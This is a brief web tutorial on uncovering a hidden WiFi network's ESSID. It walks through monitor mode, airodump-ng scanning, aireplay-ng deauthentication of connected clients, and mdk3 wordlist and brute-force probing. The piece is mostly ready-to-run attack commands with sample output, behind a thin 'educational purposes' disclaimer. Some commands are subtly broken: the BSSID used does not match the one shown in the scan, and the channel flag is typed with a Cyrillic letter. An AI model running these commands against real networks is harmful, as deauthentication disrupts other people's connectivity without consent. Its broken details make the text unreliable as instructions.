How to Find Hidden WiFi ESSID

How to Find Hidden WiFi ESSID

Disclaimer: Everything on this site is for educational purposes and should not be used for evil.

You will need:

Airodump-ng,
Aireplay-ng / mdk3,
A wifi adapter, which can be put into Monitor mode

Tutorial:

Open the terminal and type:
ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up
Start Airodump-ng:
airodump-ng wlan0

Look for a line that looks like this:
20:02:AF:32:D2:61  -40      108        3    0   6  54e  WPA2 CCMP   PSK  <length:  3>
This is a hidden WiFi

How to find the ESSID of the Hidden WiFi with aireplay-ng

Run this command, replacing [BSSID], with the BSSID of the hidden network:
aireplay-ng -0 3 -a 20:25:64:16:58:8C wlan0

The line that interests us looks like this:
20:25:64:16:58:8C  -34 100     1270      601    0   1  54e  WPA2 CCMP   PSK  SecondaryAP
The ESSID of the network is SecondaryAP

How to find the ESSID of the Hidden WiFi with mdk3

Using an ESSID wordlist:

Run this command, replacing [BSSID] with the BSSID, and [Wordlist] with the path to your ESSID wordlist:
mdk3 wlan0 p -t [BSSID] -f [Wordlist]

Using bruteforce:

Run this command, replacing [BSSID] with the BSSID and [Channel] with the channel of the hidden WiFi:
mdk3 wlan0 p -t [BSSID] -с [Channel] -b [Mode]

Here is a list of modes:
  • All letters (a)
  • Lowercase (l)
  • Uppercase (u)
  • Numbers (n)
  • Lowercase + Uppercase (c)
  • Lowercase + Uppercase + Numbers (m)

Comments